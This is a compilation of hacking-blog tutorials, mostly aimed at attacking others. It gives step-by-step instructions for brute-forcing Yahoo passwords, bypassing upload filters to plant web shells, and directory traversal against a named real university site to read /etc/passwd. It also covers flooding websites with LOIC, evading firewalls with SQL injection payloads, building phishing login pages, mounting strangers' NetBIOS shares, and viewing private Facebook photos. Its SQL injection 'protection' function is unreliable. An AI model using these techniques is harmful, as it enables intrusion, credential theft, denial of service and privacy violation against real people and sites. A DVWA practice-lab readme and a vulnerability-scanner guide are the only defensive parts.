How to Format a Pen Drive in NTFS Type in Windows 7

We all know that All Pen Drive Default Type is FAT/FAT32 but sometimes if we want to use Pen Drive as System Drive or for window installation purpose then we need some modification...

In this Post i guide you how to convert a FAT Drive in NTFS(System)Type.....

Step 1:-Insert Pendrive and Run a Virus scan and delete all the Viruses,becauseVirus may effect ur USB drive efficiency.

Step 2:-Now BackUp all the Data of Pendrive.

Step 3:-Go to My Computer and press Right Click of Mouse on PenDrive icon.

 Step 4:-Now go to Format Option and Click on 'Restore Device Defaults'.

             After This Open File System Coloumn and select NTFS,

And Now Click on 'Start' and wait for few second....

After Formating Message Come "Format Complete" and Press 'Ok'

Your Device is ready for use and now you use device as System Device.

NOTE: If u want to format pendrive with NTFS and use as Bootable Device using command Prompt.then view my earlier POST

SEARCH ENGINE OPTIMIZATION

SEARCH ENGINE OPTIMIZATION

Nowwards we will moov 2 SEO[SEARCH ENGINE OPTIMIZATION],thenwards SOFTWARES ND CRACKING ,THEN WARDS PROXY ND THENWARDS HACKING IN 2 OTHER'S COMUTER.
THESE R D NEXTCHAPTERS.
LET'S START learning seo.
Well,SEO gives us d exact thing vch we want 2 get 4m google.suppose dt u r searching 4 something on google then google gives u more than 100000 pages nd it is very much difficult 2 find ur exact needed thing in a single shot.SEO gives u d exact thing vch u need exactly.let's start SEO
go here,
http://newyears.noo.com/noo/m/browse...wevent/id/518/
here u can see written dis line
"New Years Eve at Pink Elephant"
this is dCOLOR="RED"] "title"[/color] of dis web page
d link vch i posted above is d "url"
nd all d data vch has written der is "text"
now,suppose dt u vant 2 search anything on google nd u want 2 search 4 forum then simpally type
inurl:forum
i mean wenever u hv 2 search anything in url ,write
inurl:desired thing
wenever u hv 2 search in text write
intext:desired thing
wenever u hv 2 search anything in text write
intext:desired thing
well, i know most of u r knowing these things already bt d ppl who r nt knowing these,plz try 2 understand dis thing,vdout SEO,u ppl vl feel a lot of problem while hacking a website 4 sql injection,searching cracks on internet nd 4 deirectry transeversal ,it is very much essential thing
well,

Now do some practice vd d thing vch i wrote here
suppose dt u want 2 search d new year celebration then simpally write in google
intitle:new year celebration
if u vant 2 search any websit's login page then type
intext:login inurl:website address
nd search 4 .
now suppose dt u want 2 find anything in a specific website then use dis syntax
site:website fulll address d thing vch u want2 search in dt website
dis syntax is really very good.
NOW SUPPOSE DT U WANT 2 SEARCH ANY PDF TYPEFILE OR doc type file then simpally use dis syntax
filetype:pdf
d next thing in SEO IS
RELATED NAMED STUFF,u know dt yahoo is a search

D SUMMARY OF D CHAPTER

[1]4 searching something in url use"inurl:"
[2]4 srching in title use"intitle:"
[3]4 srhcing in text use "intext:"
[4]2 get a file of specific type use "filetype::
[5]2 restrct ur search in a website use "site:websiteaddress urdesired seacrhing item"
[6]2 get information about a website use"info:website full addres"
[7]2 get related type sites type"related:website ful address"
[8]2 nt appear a syntax in ur srch results use a minus[dash] sign.
to d person who r reading this type thing first time,i m requsting them 2 do very much practice vd all of dese syntaxes.
a good person always searches by dese techniques.u can find many books related on google ,i hv read all of dem nd thenwards i hv written all d results driven 4m dem.
do a hell of practice plz

How to view Private Facebook Profiles

Learn how to view private facebook profiles

In post i will tell you how to view private facebook profiles,This latest hack proves that anyone in the world is able to view anyone’s private tagged pictures,This is why facebook is not privite is still open even after such publicity all over the web.Major security threat.
Have you ever wanted to see pictures of an enemy but you couldn’t because her or his facebook account was set to private. Well thats all going to change because I will show you very simple way to view private facebook profiles

Method:

1. Login in your Facebook Account
www.facebook.com

2. Search for the person

3. Find the persons ID # by Clicking on Send messages

5. Copy and Replace the ID # to the link


http://www.facebook.com/photo.php?pid=1234567&id=[Person’s ID]&op=1&view=all&subj=[Person’s ID]

6. Copy and paste the link in your browser

7. You should be able to see 10-20 pictures before facebook denies you access. 

Find email via brute force

Here is a tutorial Find email ids thru brute force,its not so much efficient process because it takes a lot of time

Procedure:

1.Download Brute Force Software .

2.Excract on desktop and lets start/ ok run it

3.To find email in target bar write:
pop.mail.yahoo.com

4.Type most be: POP3

5.Put connections to 60 and timeout to 60

6.Make sure you check a ''Single User''

7.Then when you check that to single user write in that bar you victims yahoo acc ID / explanation .. like googleboy@yahoo.com his ID will be googleboy .. write that

8.Password mod put on: ''Brute Force''

9.Then click ''Range''(a new window will pop up)

10. Then make sure you put ''Min Lenght'' 6 and ''Max Lenght'' to 16

11.Then put custom range .. there will be default Abcd.. etc and some numbers ..

12.Click OK

if u have any problem then ask here i will try to remove it

  About the Author
  XEO Hacker, the founder of Hack With Style (HWS).

How Websites Get Hacked With FileUpload Vulnerability?

Hi,In this Post i show you a another method of website hacking.........

The vulnerability which we are about to demonstrate in my opinion is the number 1 reason why websites hacked and are exploited further to the server level. When a hacker performs a SQL Injection attack on a website he needs a way to get shell level access and install the PHP backdoor so he can touch other files on server or compromise the server itself if it's vulnerable. If we could secure our uploads and restrict our upload area so that they don't allow it does not allow the upload of other files instead of images we can protect our upload area.

However there is a problem, The PHP files can still be uploaded by various methods. The most common method is by renaming the PHP backdoor to the following and then uploading the shell.

shell.php;.jpg
shell.php.jpg
shell.php..jpg
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;

However there is also a method to block the upload of the above files. But there is also another way to bypass it even if the uploading of the files name with the above extension is blocked. We will use tamper data for this purpose.

Step 1 

Install http live headers firefox extention, then go to the upload section. Open Live HTTP Headers and upload shell. Now if you try to go to the link where you have your shell uploaded it will give you error (only on some websites) so we will have to change that hidden .php.jpg extension into the .php.

So as we uploaded the shell and opened the Live HTTP Headers you should find where you have uploaded your shell. You will have to find the line where ti writes that you uploaded the shell. Select it and then click on button reply.

Step 2 - 

After uploading, find the directory where your fle uploaded, example if you uploaded it in images then it will be in http://website/images/shell.php. The rest of the steps are self explanatory.

 

How To Protect Your Website from the FileUpload Vulnerability?

That's a separate topic and will be explained in a separate post. However for now I would recommend you to install a third party fileuploading service, Where the file get's uploaded the fileuploading service's server not yours.

About the author : 

Minhal Mehdi is a Tech Blogger and Ethical Hacker, He runs a blog http://www.devilscafe.in. where he writes about Exploits and vulnerabllies  

Source:-www.rafayhackingarticles.net

Make the Best Out Of A Vulnerability Scanner?

As your knowledge and experience in security increases, you start looking at a variety of security solutions that could help you do a better job and automate many of the processes. One of the first products that you would probably test is a vulnerability scanner. That’s an excellent first step but now comes the harder part, if you are new to vulnerability scanning, how do you go about making effective use of this solution?

Not all vulnerability scanners are the same and some of the functionality mentioned in this article may or may not be available to you; however I recommend that you go for a solution that gives you as wide a range of features as possible.

Inventory

Most good vulnerability scanners will keep an eye on the hardware and software deployed on your network. This is very valuable information. Run an inventory on your network to ensure that you are aware of everything that is installed and that it has been approved for use. Once completed set your vulnerability scanner to notify you of any changes from this baseline.

Scheduled scans

If your vulnerability scanner allows you to configure a periodic scan, create a schedule to scan your network daily. Select a time that least impacts your organization because a vulnerability scan can be slightly disruptive.

Port scanning

Malware can be stealthy and hide itself in several ways, therefore the more methods in use, the higher the rate of detection. Take note of any open ports each system has and look out for ports that should not be open and investigate further since this may indicate the presence of malware.

Patch management

A good vulnerability scanner will let you know what patches are missing on your system. Most will also allow you to deploy the patches. Before that, however, it is best practice to set up a testing environment that mirrors your live environment. This test network can be based on the inventory previously obtained using the vulnerability scanner. Test the missing patches on this test environment to ensure that they do not conflict with the current network setup – if all is well deploy them to the live environment.

Other vulnerabilities

Not all vulnerabilities can be addressed through patch management; some do not have patches available and others are configuration related. A good vulnerability scanner will point these out, give you information on such vulnerabilities and provide you with information on how to address them.

Security policies and software

A good vulnerability scanner will outline the security policies set on each of the scanned machines. It will also check if the antivirus software installed is up to date.

Monitoring these six basic items will ensure you have the necessary information to keep your network secure.

Always keep an eye on hardware and software changes and update the test environment accordingly. Carry out frequent scheduled scans, look out for open ports, and set notifications so that you are informed when a new port is opened. Regularly apply patches and fix any vulnerabilities that are detected as soon as possible.

This guest post was provided by Emmanuel Carabott on behalf of GFI Software Ltd. GFI is a leading software developer that provides a single source for network administrators to address their network security, content security and messaging need. Learn more on what to look out for when choosing a vulnerability scanner.

Source:- www.rafayhackingarticles.net

Learn Website Hacking And Security With DVWA Tools

hi i m deepesh and in this post i teach you How can you be good at website hacking and web application security, The thing is that even if you have an idea of how some popular website application attack work but still you need a safe environment to practice what you have learned because you are not allowed to access any website even for testing purposes unless and until you are not authorized to do that, This is where Damn vulnerable web app(DVWA) comes into play
Basically Damn vulnerable web app(DVWA) PHP/MySQL web app which is Damn vulnerable, DVWA web app allows you to learn and practice web application attacks in a safe environment, It's latest version is DVWA 1.7. 

Vulnerabilities

• SQL Injection
• XSS (Cross Site Scripting)
• LFI (Local File Inclusion)
• RFI (Remote File Inclusion)
• Command Execution
• Upload Script
• Login Brute Force
• Blind SQL Injection 

And much more.

Official warning

It should come as no shock..but this application is damn vulnerable! Do not upload it to your hosting provider’s public html folder or any working web server as it will be hacked. It’s recommend that you download and install XAMP onto a local machine inside your LAN which is used solely for testing.

Open this Video for Installation....
http://www.youtube.com/watch?v=GzIj07jt8rM

 NOW I PASTED THE INFORMATION FROM DVWA...

############################################################
################# DAMN VULNERABLE WEB APP ##################
############################################################

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

############
# WARNING! #
############

Damn Vulnerable Web App is damn vulnerable! Do not upload it to your hosting provider's public html folder or any working web
server as it will be hacked. I recommend downloading and installing XAMPP onto a local machine inside your LAN which is used solely for testing.

We do not take responsibility for the way in which any one uses Damn Vulnerable Web App (DVWA). We have made the purposes of the application clear and it should not be used maliciously. We have given warnings and taken measures to prevent users from installing DVWA on to live web servers. If your web server is compromised via an installation of DVWA it is not our responsibility it is the responsibility of the person/s who uploaded and installed it.

###########
# License #
###########

This file is part of Damn Vulnerable Web App (DVWA).

Damn Vulnerable Web App (DVWA) is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

Damn Vulnerable Web App (DVWA) is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with Damn Vulnerable Web App (DVWA).  If not, see http://www.gnu.org/licenses/.

################
# Installation #
################

Default username = admin
Default password = password


The easiest way to install DVWA is to download and install 'XAMPP' if you do not already have a web server setup.

XAMPP is a very easy to install Apache Distribution for Linux, Solaris, Windows and Mac OS X. The package includes the Apache web server, MySQL, PHP, Perl, a FTP server and phpMyAdmin.

XAMPP can be downloaded from:
http://www.apachefriends.org/en/xampp.html

Simply unzip dvwa.zip, place the unzipped files in your public html folder, then point your browser to http://127.0.0.1/dvwa/index.php


##################
# Database Setup #
##################

To set up the database, simply click on the Setup button in the main menu, then click on the 'Create / Reset Database' button. This will create / reset the database for you with some data in.

If you receive an error while trying to create your database, make sure your database credentials are correct within /config/config.inc.php

The variables are set to the following by default:

$_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = '';
$_DVWA[ 'db_database' ] = 'dvwa';

An explanation of these variables:

$_DVWA[ 'db_user' ] = 'your_database_username';
$_DVWA[ 'db_password' ] = 'your_database_password';
$_DVWA[ 'db_database' ] = 'your_database_name';


###################
# Troubleshooting #
###################

For the latest troubleshooting information please visit: http://www.dvwa.co.uk/forum/viewtopic.php?f=5&t=7


+Q. SQL Injection wont work on PHP version 5.2.6.

-A.If you are using PHP version 5.2.6 you will need to do the following in order for SQL injection and other vulnerabilities to work.

In .htaccess:

    Replace:

    <IfModule mod_php5.c>
    php_flag magic_quotes_gpc off
    #php_flag allow_url_fopen on
    #php_flag allow_url_include on
    </IfModule>

    With:

    <IfModule mod_php5.c>
    magic_quotes_gpc = Off
    allow_url_fopen = On
    allow_url_include = On
    </IfModule>

+Q. Command execution won't work.

-A. Apache may not have high enough priviledges to run commands on the web server. If you are running DVWA under linux make sure you are logged in as root. Under Windows log in as Administrator.
   
+Q. My XSS payload won't run in IE.

-A. If your running IE8 or above IE actively filters any XSS. To disable the filter you can do so by setting the HTTP header 'X-XSS-Protection: 0' or disable it from internet options. There may also be ways to bypass the filter.


# Contact: dvwa@dvwa.co.uk 
# Website: http://www.dvwa.co.uk
# Download: http://sourceforge.net/projects/dvwa/
# SVN: http://dvwa.svn.sourceforge.net/svnroot/dvwa

# Created by: The DVWA team.


Source:- www.rafayhackingarticles.net 

Hack a website using Directory Transversal attack?

What is root directory of web server ?

It is a specific directory on server in which the web contents are placed and can be seen by website visitors. The directories other that root may contain any sensitive data which administrator do not want visitors to see. Everything accessible by visitor on a website is  placed in root directory. The visitor can not step out of root directory.

what does ../ or ..\ (dot dot slash) mean  ?

The ..\ instructs the system to go one directory up. For example, we are at this location C:\xx\yy\zz. On typing ..\ , we would reach at C:\xx\yy.

Again on typing ..\ , we would rech at C:\xx . 

Lets again go at location C:\xx\yy\zz. Now suppose we want to access a text file abc.txt placed in folder xx. We can type ..\..\abc.txt . Typing ..\ two times would take us two directories up (that is to directory xx) where abc.txt is placed.

Note : Its ..\ on windows and ../ on UNIX like operating syatem.

What is Directory Transversel attack?

Directory Traversal is an HTTP exploit which allows attackers to access restricted directories and execute commands outside of the web server's root directory.

The goal of this attack is  to access sensitive files placed on web server by stepping out of the root directory using dot dot slash .

The following example will make clear everything

Visit this website vulnerable to directory transversal attack

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=notification.php

This webserver is running on UNIX like operating system. There is a directory 'etc' on unix/linux which contains configration files of programs that run on system. Some of the files are passwd,shadow,profile,sbin  placed in 'etc' directory.

The file etc/passwd contain the login names of users and even passwords too.

Lets try to access this file on webserver by stepping out of the root directory. Carefully See the position of directories placed on the webserver.

We do not know the actual names and contents of directories except 'etc' which is default name , So I have

marked them as A,B,C,E or whatever.

We are in directory in F accessing the webpages of website.

Lets type this in URL field and press enter

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=etc/passwd

This will search the directory 'etc' in F. But obviously, there is nothing like this in F, so it will return nothing

Now type

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../etc/passwd

Now this will step up one directory (to directory E ) and look for 'etc' but again it will return nothing.

Now type 

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../etc/passwd

Now this will step up two directories (to directory D ) and look for 'etc' but again it will return nothing.

So by proceeding like this, we we go for this URL

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../../../../etc/passwd

It takes us 5 directories up to the main drive and then to 'etc' directory and show us contents of 'passwd' file.

To understand the contents of 'passwd' file, visit http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format

You can also view etc/profile ,etc/services and many others files like backup files which may contain sensitive data. Some files like etc/shadow may be not be accessible because they are accesible only by privileged users.

Note- If proc/self/environ would be accessible, you might upload a shell on server which is called as Local File Inclusion.

Counter Measures

1. Use the latest web server software

2. Effectively filter the user's input 

Source:- www.rafayhackingarticles.net

Protect Your Website Against SQL Injection

Hacker-one: “ YES, I DID IT !!! “

Hacker-two: “What ? “

Hacker-one:” I HACKED ANOTHER SITE!!! “

Hacker-two: “Great!!! How did you do that? “

Hacker-one:” SQL INJECTION !!! :p “

Yes, one of the common methods that are being used by hackers is SQL INJECTION.

Sites get hacked by the sql injection due to the loop hole that is left by developers most of the times while developing a web application.

I will be explaining you today how to avoid SQL INJECTION when you are developing a web application with PHP.

I will be explaining with the help of an example, suppose we have text fields on our form

1. User Name

2. Password

and a login button.

When we login, the validation for the valid user is checked on the back-end. If the user is a valid user, he logs into the system else an error message “incorrect username or password” is shown.

What happens on the back-end,

$userName=$_POST[‘userName’];


$password =$_POST[‘password’];

$sqlQuery=”select * from users where user_name= ‘”.$userName.”’ and user_password= ‘”.$password.”’ ;  ”;

This is where the developer has left a loop hole if instead of password I enter  ‘ or ‘a’=’a the password field has the value


$password is  ‘or ‘a’=’a

Lets place this value in query and the query becomes

$sqlQuery=”select * from users where user_name= ‘”.$userName.”’ and user_password=’ ‘or ‘a’=’a’;   ”;

You can see clearly , password doesn’t match but the other statement  a=a matches so  OR operator will work and the user will login into the system without knowing the actual password. I can even give you the names of some famous websites  where you can inject sql or use this technique.

HOW TO AVOID IT ???


Don’t treat the field values as mentioned above

Use this function

function BlockSQL Injection($str){           

return str_replace(array("'",""","'",'"'), array("&#39;","&quot;","&#39;","&quot;"), $str);

}

This will replace the characters( that can break the string) in the string.

So you can use this function as

$userName= BlockSQL Injection ($_POST[‘userName’]);


$password = BlockSQL Injection ($_POST[‘password’]);


Now the hacker wont be able to break the QUERY STRING.

We have many frameworks in PHP that provide this functionality such as quotes_to_entities($string) in CODE IGNITER.

Use some desgin pattern when you are building a big application, model, controller, your view layers and DAO (data access object layer) must be implemented to make it losely coupled and extensible.

A huge number of sites have been developed in core php, where we don’t use any framework. Wordpress is very secure but when it comes to PLUGINS (that we donwload and use), they can have the loop holes inside them. Stay alert while developing web applications, you never know when you are gonna get hacked. Stay blessed! :)

Good Luck !


About The Author

Danyal Sandeelo is a Software Developer at "breezecom".

Flood/Hack a website with denial of service attack

What is a Denial Of Service Attack?

A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.
If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack,this one of the most used method for website hacking

Types of denial of service attacks

There are several general categories of DoS attacks.Popularly, the attacks are divided into three classes:

bandwidth attacks,
protocol attacks
logic attacks


What is Distributed Denial of Service Attack?

In DDOS attack, The attacker launches the attack using several machines. In this case, an attacker breaks into several machines, or coordinates with several zombies to launch an attack against a target or network at the same time.
This makes it difficult to detect because attacks originate from several IP addresses.If a single IP address is attacking a company, it can block that address at its firewall. If it is 30000 this is extremely difficult.

Damages made By Denial of service attack:

Over past years Denial of service attack has made huge amount of damage,Many of the have been victimed of this attack
Its Real,On February 6th, 2000, Yahoo portal was shut down for 3 hours. Then retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening, eBay (EBAY), Amazon.com (AMZN), and CNN (TWX) had gone dark. And in the morning, the mayhem continued with online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off.

This attack also recently hit twitter on 6th August 2009,lot of people had trouble on logging on twitter,It was brought down by denial of service attack,They tired up there server so no one can get on log on it.Websites like facebook,ebay etc have also been victim of this attack.

 

 Now i will show you how you can flood a website with Denial of service attack. For this tutorial we will be using one of the most effective and one of the least known tools called "Low Orbit Ion Cannon", created by Anonymous members from 4chan.org, this program is one of the best for DDoS'ing, and I have successfully used it to DDoS websites. An internet connection as bad as mine (2,500 kb/s) was able to keep a site down for a day with this program running. Remember that this tool will work best with high internet speeds, and try not to go for impossible targets (like Google, Myspace,Yahoo). LOIC is used on a single computer, but with friends it's enough to give sites a great deal of downtime.

Prerequisites: Download LOIC (Low Orbit Ion Cannon). Open up LOIC.
(I am not giving a download link because then i will be accused for exiting hackers,try goggling).

Step 1: Type the target URL in the URL box.

Step 2: Click lock on.

Step 3: Change the threads to 9001 for maximum efficiency.

Step 4: Click the big button "IMMA FIRIN MAH LAZAR!"

Feel free to tweak around with these settings and play around with the program to get the best performance. Then minimize and go do whatever you need to do, the program will take care of the rest!  

Source:- www.rafayhackingarticles.net 

SQL Injection Filter Evasion Part 1

In this tutorial I will explain you some of the basics of SQL Injection filter Evasion, This is the first part of the two of the articles I will post on SQL Injection filter evasion and bypassing,  In this post I am not gonna teach you Basics of SQL injection, I will assume that you already know them, because cmon every one talks about it, you will find tons and tons of posts on forums related to basics of SQL Injection, In this post I will talk about common methods of used by hackers and pentesters for evading IDS, IPS, WAF's such as Modsecurity, dotdefender etc.

WebApplication Firewalls:

 

According to webappsec "Web Application Firewall (WAF): An intermediary device, sitting between a web-clientand a web server, analyzing OSI Layer-7 messages for violations in the programmedsecurity policy. A web application firewall is used as a security device protecting theweb server from attack."

Almost all Webapplication firewalls and IDS use Signature based protection, where they are looking of common inputs such as "'Or 1=1", "Or x=x" etc. But in my opinion webapplication firewalls are only good for detecting automated tools and script kiddies. However if the tool you are using for attacking a SQL Injection vulnerable database is an open source such as SQLMAP, You can easily modify it to evade a webapplication firewall.

Detecting A WAF:

Before learning about bypassing the WAF, You must know how to detect a Webapplication firewall. There are numerous methods of detecting if the target website is using a Webapplication firewall.

Prompt Message:

1. If you are attacking a website and you get an error like "Hacking attempt detected" or "Page not found", you are up against a WAF.

Cookies:

The most common method of detecting a webapplication firewall is by capturing the http:// request, Lots of WAF's add their own cookie in the HTTP communication.

Here is a live brazilian website using WAF, The cookie value "WAT" shows that the target host is using a WAF:

        GET /news.asp?PageId=254 HTTP/1.1Host: www.poupex.com.brUser-Agent: Mozilla/5.0        (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.12)Accept: image/png,*/*;q=0.5Accept-Encoding: gzip,deflateKeep-Alive: 300Proxy-Connection: keep-aliveReferer: http://www.SomeSite.comCookie:ASPSESSIONCWKSPSVLTF=OUESYHFAPQLFMNBTKJHGQGXM;ns_af=xL9sPs2RIJMF5GhtbxSnol+xU0uSx;ns_af_.SomeSite.com_%2F_wat=KXMhOJ7DvSHNDkBAHDwMSNsFHMSFHEmSr?nmEkaen19mlrwBio1/lsrzV810C&

Dotdefender:

If you are up against a Dotdefender you will get the following error message:

Observing HTTP Response:

If you see a similar http response whenever you make a malicious http request, you are probably up against a MOD secuirty WAF.

HTTP/1.1 501 Method Not ImplementedDate: Fri, 27 Jun 2008 23:30:54 GMTAllow: TRACEContent-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1http://ws.

WEBAPPLICATION Firewall Evasion:

There are tons and tone of methods to evade a webapplication firewall, Here is some of them:

1. Comments.
2. Changing Cases.
3. Encoding.

And much more.

Example of a sample IDS and WAF Signature:

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection attempt detected, Your IP has been logged”;

flow: to_server, established; content: “' or 1=1 --”; nocase; sid: 1; rev:1;

The above signature is telling WAF that if the attackers inputs the following content into the webpage "' OR 1=1" display the message "SQL Injection attempt detected, Your IP has been logged".

Bypassing The Signature:

Such poorly written signatures can be easily bypassed.  Think for a second what if the attacker inputs ' OR 2=2, Isn't 2=2, How about OR 3=3 and so on. So such poorly written signatures are good for nothing.  You can also add comments in order to bypass more complex signatures, e.g OR 2/**/=/**/2.

Comments:

Comments are one of the most easiest ways to defeat a WAF, As lots of signatures are not looking for the comments they are just looking for the malicious keywords.

Union statement against a WAF without comments:

www.site.com/a.php?id=123 union select 1,2,3,4,5-- BLOCKED

Union statement against a WAF with comments:

www.site.com/a.php?id=123 union/*We are bypassing the WAF*/select/*Rafay Hacking Artcles*/1,2,3,4,5-- ALLOWED

Changing Cases:

Some WAF's don't have any rule or signatures to detect upper cases, Here are some examples of a union statement with Uppercase.

uNiOn aLl sElEcT 

UnIoN aLL SELECT

You can combine uppercase statements with comments for more better results:

www.site.com/a.php?id=123 uNiOn All sEleCt/*We are bypassing the WAF*/select/*Rafay Hacking Artcles*/1,2,3,4,5--

Well I hope you have liked this post, In this post we talked about detecting a WAF and some basic techniques on evading a webapplication firewall, However in the next post we will look at some more advanced techniques such as encoding, whitespaces etc to bypass a webapplication firewall.

Source:- www.rafayhackingarticles.net

How to create Fake login page for any website

A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.

So in this post i will show method to create Fake login page for desired site:


How to create fake login page - Procedure?


Now it's easy to build a Fake Login Pages without any knowledge of Programming Languages. One can use http://www.jotform.com to build the Sign Up page.


{1} Open www.jotform.com and Sign Up.
{2} then Login there with your newly registered account.
{3} now click on ‘ Create your first form’.
{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)
{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)
{6} Now Click on ‘Power Tool’ Option (In right hand side…)
{7} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’
{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.
{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.
{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…)
{11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.
{12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′.
{13} Now open Notepad text editor and write the following code their.
Paste the Option2 code here
{14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it.
Now you can view it by typing the url in the address bar.


NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on www.110mb.com and there are many other sites which you can find on the internet very easily.
I suppose that you created your account at 110mb.com
now login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.
Now you can access you file on the net by just typing the url of the file.
And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form.


Source:- www.rafayhackingarticles.net  

Netbios Hacking

 

THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER. NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.

STEP-BY-STEP NETBIOS HACKING PROCEDURE

1.Open command prompt

2. In the command prompt use the “net view” command
( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS. BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).

                                   Example: C:\>net view \\219.64.55.112

The above is an example for operation using command prompt. “net view” is one of the netbios command to view the shared resources of the remote computer. Here “219.64.55.112? is an IP address of remote computer that is to be hacked through Netbios. You have to substitute a vlaid IP address in it’s place. If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown. If not an error message is displayed. So repeat the procedure 2 with a different IP address.

3. After succeeding, use the “net use” command in the command prompt. The “net use” is another netbios command which makes it possible to hack remote drives or printers.
                                             Example-1:
                                             C:\>net use D: \\219.64.55.112\F
                                             Example-2:
                                             C:\>net use G: \\219.64.55.112\SharedDocs
                                             Example-3:
                                             C:\>net use I: \\219.64.55.112\Myprint
 

   NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.

NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES, FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER. THAT IS, IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DRIVE. AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT
F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer. These are displayed after giving “net use” command. “219.64.55.112? is the IP address of remote computer that you want to hack.

4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.

Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name. You can open it and access remote computer’s Hard-Drive. You can copy files, music, folders etc. from victim’s hard-drive. You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system. You can access files/folders quickly through “Command Prompt”.

NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios. That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed). So Repeat The Procedure 2,3 With Different IP Address.

Source:- www.gohacking.com